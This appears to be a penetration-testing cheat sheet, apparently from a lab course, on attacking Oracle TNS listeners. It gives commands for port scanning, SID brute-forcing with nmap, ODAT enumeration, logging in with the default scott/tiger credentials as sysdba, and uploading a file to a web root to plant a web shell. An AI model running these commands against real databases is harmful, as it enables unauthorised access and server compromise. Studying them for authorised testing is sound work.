Oracle Transparent Network Substrate (TNS) server is a communication protocol that allows for communication between Oracle databases and application over networks. TNS can use multiple networking protocols.
Default configuration depends heavily on the version and edition installed on the system. By default the connections are accepted on the TCP/1521 port. Listeners by default only accept connections from authorized hosts and have some basic authentication. Oracle TNS is heavily connected into the Oracle ecosystem.
Databases or services has a unique tnsnames.ora file that contains the information necessary to connect to the service.
listener.ora is a server-side configuration file that defines the listener process’s properties and parameters, responsible for receiving incoming client requests and forwards them to the oracle database instance.
Oracle RDBMS, an SID is a unique name that identifies a unique database instance.
TNS Port Scan
Start by confirming the listener on TCP/1521.
# scan the Oralce TNS port
sudo nmap -p1521 -sV 10.129.204.235 --openSID Brute Force
Brute force SIDs before connecting because the SID identifies the database instance.
# SID bruteforcing
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-bruteODAT Enumeration
Use ODAT when you want broad Oracle database checks from one tool.
# enumerate ALL information
./odat.py all -s 10.129.204.235
cDatabase Connection
Connect once you have credentials and SID/service name.
# connect to the Oracle database
sqlplus scott/tiger@10.129.204.235/XE
# Database enumeration
sqlplus scott/tiger@10.129.204.235/XE as sysdbaFile Upload
If the servers runs a web server, and we know the root directory of it. We can upload a web shell.
# Upload files
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt